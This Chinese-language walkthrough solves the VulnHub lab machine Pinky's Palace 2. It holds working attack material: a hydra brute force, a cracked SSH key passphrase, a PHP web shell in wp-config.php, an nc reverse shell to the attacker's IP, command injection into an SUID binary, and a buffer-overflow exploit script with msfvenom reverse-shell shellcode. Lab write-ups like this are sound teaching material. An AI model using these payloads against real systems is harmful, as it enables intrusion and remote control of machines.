前言
⏰时间:2023.7.28
🗺️靶机地址:https://download.vulnhub.com/pinkyspalace/Pinkys-Palace2.zip
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
信息收集
我们使用可以使用netdiscover,arp-scan,nmap去发现主机
┌──(eric㉿kali)-[~]
└─$ nmap -sn 192.168.58.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 14:33 HKT
Nmap scan report for 192.168.58.2
Host is up (0.00097s latency).
Nmap scan report for 192.168.58.153
Host is up (0.00026s latency).
Nmap scan report for 192.168.58.161
Host is up (0.00066s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 6.32 seconds
本次目标是192.168.58.161
为了方便后续操作,设置目标ip为变量
┌──(eric㉿kali)-[~]
└─$ export T='192.168.58.161'
┌──(eric㉿kali)-[~]
└─$ echo $T
192.168.58.161
┌──(eric㉿kali)-[~]
└─$ nmap -sC -A -T4 -p- $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 14:47 HKT
Nmap scan report for 192.168.58.161
Host is up (0.00042s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.4
|_http-title: Pinky's Blog – Just another WordPress site
|_http-server-header: Apache/2.4.25 (Debian)
4655/tcp filtered unknown
7654/tcp filtered unknown
31337/tcp filtered Elite
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.34 seconds
目标存在wordpress
访问80端口发现不正常显示,点击login发现url变为http://pinkydb/wp-login.php
需要将域名和ip加入hosts文件
网站首页点击passione
发现一个用户名pinky1337
┌──(eric㉿kali)-[~]
└─$ nikto -h pinkydb
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.58.161
+ Target Hostname: pinkydb
+ Target Port: 80
+ Start Time: 2023-07-27 15:09:48 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: <http://pinkydb/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /secret/: Directory indexing found.
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login.php: Wordpress login found.
+ 7850 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2023-07-27 15:10:01 (GMT8) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
看到一个secret目录,访问一下看看
文本中内容如下:
8890
7000
666
pinkydb
提供了三个端口,可能需要port knocking,之前扫描到三个端口未开放
端口敲击
端口敲击是一种安全措施,防止被直接探测出开放的端口。我们可以通过knock正确的端口顺序,进而从防火墙外部打开正确的端口
经过测试找到正确端口敲击顺序
┌──(eric㉿kali)-[~]
└─$ export T=pinkydb
┌──(eric㉿kali)-[~]
└─$ for i in {7000,666,8890};do nc -vz $T $i;done
pinkydb [192.168.58.161] 7000 (bbs) : Connection refused
pinkydb [192.168.58.161] 666 (?) : Connection refused
pinkydb [192.168.58.161] 8890 (?) : Connection refused
┌──(eric㉿kali)-[~]
└─$ nmap $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 16:10 HKT
Nmap scan report for pinkydb (192.168.58.161)
Host is up (0.00068s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
31337/tcp open Elite
Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
敲击后31337为open,进一步扫描
┌──(eric㉿kali)-[~]
└─$ nmap -sT -Pn -T4 -A -v -p- $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 16:11 HKT
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 4.9.4
|_http-title: Pinky's Blog – Just another WordPress site
|_http-server-header: Apache/2.4.25 (Debian)
4655/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
| 256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_ 256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp open http nginx 1.10.3
|_http-title: Pinkys Database
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3
31337/tcp open Elite?
| fingerprint-strings:
| GetRequest:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| HTTP/1.0
| NULL:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| SIPOptions:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS sip:nm SIP/2.0
| Via: SIP/2.0/TCP nm;branch=foo
| From: <sip:nm@nm>;tag=root
| <sip:nm2@nm2>
| Call-ID: 50000
| CSeq: 42 OPTIONS
| Max-Forwards: 70
| Content-Length: 0
| Contact: <sip:nm@nm>
|_ Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.94%I=7%D=7/27%Time=64C226A8%P=x86_64-pc-linux-gnu%r(N
SF:ULL,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20i
SF:s\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.
SF:\n=>\x20\0")%r(GetRequest,6B,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\
SF:x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\
SF:x20Pinky's\x20Palace\.\n=>\x20\0GET\x20/\x20HTTP/1\.0\r\n\r\n")%r(SIPOp
SF:tions,138,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x
SF:20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palac
SF:e\.\n=>\x20\0OPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20n
SF:m;branch=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r
SF:\nCall-ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\
SF:nContent-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20applicat
SF:ion/sdp\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 16:11
Completed NSE at 16:11, 0.00s elapsed
Initiating NSE at 16:11
Completed NSE at 16:11, 0.00s elapsed
Initiating NSE at 16:11
Completed NSE at 16:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.87 seconds
发现31337提示存在后门,用nc连下看看
┌──(eric㉿kali)-[~]
└─$ nc $T 31337
[+] Welcome to The Daemon [+]
This is soon to be our backdoor
into Pinky's Palace.
=> aa
aa
这个程序会回显输入的字符,可能存在溢出
端口7654
访问7654端口,点击login
登录处简单测试没发现sql注入,准备对登录口进行爆破
已知用户名
admin
pinky
pinky1337
使用cewl对网站爬取密码
┌──(eric㉿kali)-[~]
└─$ sudo cewl -d 1 -w pass.txt http://pinkydb
# -d 1 只爬取网站一级链接的内容,不下载二级或更深层
┌──(eric㉿kali)-[~]
└─$ wc -l pass.txt
161 pass.txt
使用hydra进行爆破
┌──(eric㉿kali)-[~]
└─$ sudo hydra -L users.txt -P pass.txt -s 7654 pinkydb http-post-form '/login.php:user=^USER^&pass=^PASS^:Invalid'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-27 21:38:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 483 login tries (l:3/p:161), ~31 tries per task
[DATA] attacking http-post-form://pinkydb:7654/login.php:user=^USER^&pass=^PASS^:Invalid
[7654][http-post-form] host: pinkydb login: pinky password: Passione
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-27 21:38:48
成功登录
ssh@Stefano
提示用Stefano’s RSA私钥登录
┌──(eric㉿kali)-[~/Downloads]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,BAC2C72352E75C879E2F26CC61A5B6E7
lyydl9wiTvUrlM7SXBKgMEP5tCK70Rce65i9sr7rxHmWm91uzd2GYBgSqGRIiPLP
hJdRi8HyRIz+1tf2FPoBvkjWl+WyRPpoVovXfEjL6lVvak6W1eNOuaGBjKT+8eaF
JC62d1ozuEM2eqpPcsVp8puwzP8Q77zYpZK9IOUo3xiupv4RrnBEGPYjaC1lLFRo
zlvUtoTnRQ0QCrjYuaL7EYQ1iBWoNc5ZMn1gqhBqQ/oE7/ff4eGhtG2i1LdscVf9
syk6ZBWFFA1wqlb2Vgv5Mn5BHx27GILo7o6yZzyxAuc02oJBnrg5Btlu/Tyx8ADV
ZR70DVA3q+/UoinxJCvH3zdKzOgzqHR9rdj5hiO6Np0Qzg//aWagrij5GqBpjCEt
aY2GxxXQQ8flNelYMvdcjHvZrjW8rKwU0nhyalu0+nFnLnHH6tMvAE6oqeIxIOO6
iJD7yUTrGfz0T7lRJQ7KQfeDQH+KGKgibLi60XWKQanRmrCiMLKnidLCjctyqsgh
lm5gPpqzw8CuPQ3EqPWIHYoDPak7Mk6SfpZaC+HQRauMbQqy5crP9YTtU1ZqRgdq
MsW7gnawwpTiE2cAR+AW9Cmy/n+cWoDvn+ceSrT1q81AjL1rKFSmwLWjKiKgJHER
Kv3zSMoBEzOGKAnQ5UOwOZPX+qQVGba+CJ2sZMdynd9HZrcMD29H4CLGO+VFggqs
3XUvpIcT4Arx9fVIk3hs6XeAnCOhj5f9Q2F4JnbqPdkQzBNJHCnrE8Rl4ymQl6lF
y/hvGWmDEtbockdNHGH9vF22kZuNmGKRROfYN5pmJYD9/L3RIvcC+UGDVojeUt/A
GDvjS8QhfNRwDUwTYHSUmIkz4fQt8g2bp3EixA/EH9IXV0HoBEtPzeaclqJJRBpW
WZK54Uj51hoqymDTfhS5HAwS6XaiN+SXyfXbZAqHMOTlegYNsGsYpGMXIB1oK+OL
lSwZimExQ042jVe4gxZ0ku3Qh/utmGUf3Rf7Ksng42tSt6uaVblXxO1JRPrI/ARt
5b7CjPBBZtIXUbtPF0/mw0q0tVZH/9BWjTvvAiMPlBvFwmujGKS+BA1krTz6YErY
ifoKTISVWsz7H1p4Xn1YD0sqfFtm2TSzsDj+x1Bpw4KXwquAoRfL61F6hVQKhyaV
8H6XaJCKuj8W2RhSe32pO7/MNYyCatZz5OtUt0XHYGf2EEOkihq8hecXpzHK0pnL
RcfhpffVDMjVV70Sl54WM9mqLHRzUWZZhAUehZkKrsou0LHoTrkWkYShrT1sc7uI
LoiicfuXpWegqXYKLSTY6YVn5iKov/eE3W3mxD/MIO4Fmi4VAcCp2EwXUlwQY8jI
839VYkApkA31uNNfp4GQw7ANqsopjN6bKIPpp8FVdCbgg7DlGZUuf/4cnXOc6gDA
K4+6vpcwC4AnJVsBfgjOmWajYple0zmDkQNkj+UptG8uC7VDwcd4FBfP+ISO1LID
MtLdf1/3qMbDQsqbdHXtZs2P84CvbJ2CPfHvTrG30JfXWuZoinMXtGwxY7x/IR0V
EHc/fHCThXM7op4q0MccCJPrhPIhwrM+dHasJGsmLlyy/Oe62c2Hx2Rh09xcU0JF
-----END RSA PRIVATE KEY-----
修改私钥权限
chmod 600 id_rsa
┌──(eric㉿kali)-[~/Downloads]
└─$ ssh -i id_rsa stefano@192.168.58.161 -p 4655
The authenticity of host '[192.168.58.161]:4655 ([192.168.58.161]:4655)' can't be established.
ED25519 key fingerprint is SHA256:eHeaw9ls2D7S0rtTOflDFzyMzhGnlr+SbLsQSa8HdbU.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:2: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.58.161]:4655' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
还是需要密码
用ssh2john把私钥的hash提取出来
ssh2john id_rsa > hash
┌──(eric㉿kali)-[~/Downloads]
└─$ john hash.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secretz101 (id_rsa)
1g 0:00:00:00 DONE (2023-07-27 21:49) 2.439g/s 3184Kp/s 3184Kc/s 3184KC/s secter..secretshadow
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
爆破出密码再次登录ssh
┌──(eric㉿kali)-[~/Downloads]
└─$ ssh -i id_rsa stefano@192.168.58.161 -p 4655
The authenticity of host '[192.168.58.161]:4655 ([192.168.58.161]:4655)' can't be established.
ED25519 key fingerprint is SHA256:eHeaw9ls2D7S0rtTOflDFzyMzhGnlr+SbLsQSa8HdbU.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:2: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.58.161]:4655' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux Pinkys-Palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 17 21:18:01 2018 from 172.19.19.2
stefano@Pinkys-Palace:~$
成功登录
进入www-data
stefano@Pinkys-Palace:~$ ls
tools
stefano@Pinkys-Palace:~$ cd tools
stefano@Pinkys-Palace:~/tools$ ls
note.txt qsub
stefano@Pinkys-Palace:~/tools$ cat note.txt
Pinky made me this program so I can easily send messages to him.
stefano@Pinkys-Palace:~/tools$ ls -la
total 28
drwxr-xr-x 2 stefano stefano 4096 Mar 17 2018 .
drwxr-xr-x 4 stefano stefano 4096 Mar 17 2018 ..
-rw-r--r-- 1 stefano stefano 65 Mar 16 2018 note.txt
-rwsr----x 1 pinky www-data 13384 Mar 16 2018 qsub
发现一个suid文件,但他是pinky用户的,我们无法读取
可以尝试登录www用户
我们可以搜一下可写入的文件
stefano@Pinkys-Palace:/var/www$ find . -writable
./html/apache/wp-config.php
编辑wp-config.php
system($_GET[cmd]);
┌──(eric㉿kali)-[~]
└─$ curl http://pinkydb/wp-config.php?cmd=ls
index.php
latest.tar.gz
license.txt
readme.html
secret
wordpress
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
查看目标是否支持nc反弹shell
┌──(eric㉿kali)-[~]
└─$ curl http://pinkydb/wp-config.php?cmd=which%20nc%3Bnc%20-h%202%3E%261
/bin/nc
[v1.10-41+b1]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
┌──(eric㉿kali)-[~]
└─$ curl http://pinkydb/wp-config.php?cmd=nc%20-e%20%2Fbin%2Fbash%20192.168.58.153%205555
收到反弹shell
python -c 'import pty;pty.spawn("/bin/bash")'
然后我们需要把suid文件qsub下载分析
www-data@Pinkys-Palace:/home/stefano/tools$ python -m SimpleHTTPServer 4444
python -m SimpleHTTPServer 4444
Serving HTTP on 0.0.0.0 port 4444 ...
┌──(eric㉿kali)-[~]
└─$ wget http://pinkydb:4444/qsub
--2023-07-27 22:42:19-- http://pinkydb:4444/qsub
Resolving pinkydb (pinkydb)... 192.168.58.161
Connecting to pinkydb (pinkydb)|192.168.58.161|:4444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13384 (13K) [application/octet-stream]
Saving to: ‘qsub’
qsub 100%[====================================>] 13.07K --.-KB/s in 0s
2023-07-27 22:42:19 (153 MB/s) - ‘qsub’ saved [13384/13384]
进入 Pinky
通过string 查看qsub
/bin/echo %s >> /home/pinky/messages/stefano_msg.txt
%s <Message>
TERM
[+] Input Password:
Bad hacker! Go away!
[+] Welcome to Question Submit!
[!] Incorrect Password!
通过ghidra看到他是获取环境变量的值和用户输入对比
查看TERM,看到密码,构造命令输入
stefano@Pinkys-Palace:~/tools$ echo $TERM
xterm-256color
stefano@Pinkys-Palace:~/tools$ ./qsub ';/bin/bash; #'
[+] Input Password: xterm-256color
pinky@Pinkys-Palace:~/tools$
拿到了pinky用户
但是不完全是pinky,可以用newgrp回到默认组
也可以写入公钥再连接pinky
pinky@Pinkys-Palace:/home/pinky/.ssh$ wget http://192.168.58.153:3333/authorized_keys
--2023-07-27 08:31:57-- http://192.168.58.153:3333/authorized_keys
Connecting to 192.168.58.153:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 563 [application/octet-stream]
Saving to: ‘authorized_keys’
authorized_keys 100%[===================================>] 563 --.-KB/s in 0s
2023-07-27 08:31:57 (177 MB/s) - ‘authorized_keys’ saved [563/563]
┌──(root㉿kali)-[~/.ssh]
└─# ssh -l pinky pinkydb -p 4655
进入Demon
寻找一下可写文件
pinky@Pinkys-Palace:~$ 2>/dev/null find / -writable | grep -Ev '/proc|/sys|/run|/dev'
/tmp
/tmp/.ICE-unix
/tmp/.font-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/var/tmp
/var/www/html/apache/wp-config.php
/var/lock
/var/lib/php/sessions
/home/stefano/tools/qsub
/home/pinky
/home/pinky/.bash_history
/home/pinky/.bashrc
/home/pinky/.profile
/home/pinky/.bash_logout
/home/pinky/.ssh
/home/pinky/.ssh/authorized_keys
/home/pinky/messages
/home/pinky/messages/stefano_msg.txt
/usr/local/bin/backup.sh
看下这个backup.sh
这个文件是demon用户的,但是pinky有全部的权限,备份文件可能存在定时任务
启动监听器 nc -nvlp 6666
在backup.sh中添加:
过了一会儿收到shell
分析panel
继续搜可利用文件
2>/dev/null find / -user demon | grep -Ev '/proc|/sys|/user'
注意到/daemon/panel是个二进制文件
这个文件是root,不知道是不是31337端口的那个程序
gdb分析,info function看是否存在溢出函数
发现了strcpy函数
run启动程序
看到确实是31337端口的程序
先关闭
在handlecmd方法里找到strcpy,此函数存在溢出风险
构造exp
gdb panel
pattern_create 200 #生成测试字符串
disasseble handlecmd #拆解函数
b *handlecmd+70 #打断点
run
ctrl+c
c #continue
#复制生成字符发送到31337
python -c 'print("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")'|nc localhost 31337
将stack下面那行复制,用offset查偏移量
python -c 'print("A"*120+"B"*6)'|nc localhost 31337
找到rsp的地址
使用msf生成payload
msfvenom -p linux/x64/shell_reverse_tcp lhost=192.168.58.153 lport=7777 -b '\x00\x0a\x0b' -f python
rsp地址0x400cfb是小端格式,在网络中传输时应该用大端格式表示,脚本中为:\xfb\x0c\x40\x00\x00\x00
最终脚本为
#! /usr/bin/env python2
import sys
import socket as so
buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\x22\x80\x09\xe7\x68"
buf += b"\xff\x4e\x13\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buf += b"\xff\xe2\xf4\x48\xa9\x51\x7e\x02\xfd\x11\x79\x23"
buf += b"\xde\x06\xe2\x20\x68\x06\xaa\x20\x80\x17\x86\xa8"
buf += b"\x57\x74\x8a\x73\xc8\x80\x01\x02\xef\x14\x79\x08"
buf += b"\xd8\x06\xe2\x02\xfc\x10\x5b\xdd\x4e\x63\xc6\x30"
buf += b"\xf0\x4b\x66\xd4\xea\x32\xbf\xf1\xb7\xf5\x3c\x40"
buf += b"\xe9\x67\xc8\x1b\x97\x4e\x40\x6a\x09\xee\xb5\x3f"
buf += b"\xb7\xc7\xf5\x2d\x85\x09\xe7\x68\xff\x4e\x13"
buff = "\x90" + buf + "\xfb\x0c\x40\x00\x00\x00"
try:
server = str(sys.argv[1])
port = int(sys.argv[2])
except IndexError:
print("Usage Example: python %s 192.168.58.158 8080" % sys.argv[0])
sys.exit()
s = so.socket(so.AF_INET, so.SOCK_STREAM)
print "Attemp to send payload to panel..."
try:
s.connect((server,port))
s.send(buff+'\r\n')
print "[+] Completed!"
except:
print "[!] Unable to connect panel!"
nc -nvlp 7777
python2 exp.py 192.168.58.161 31137
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
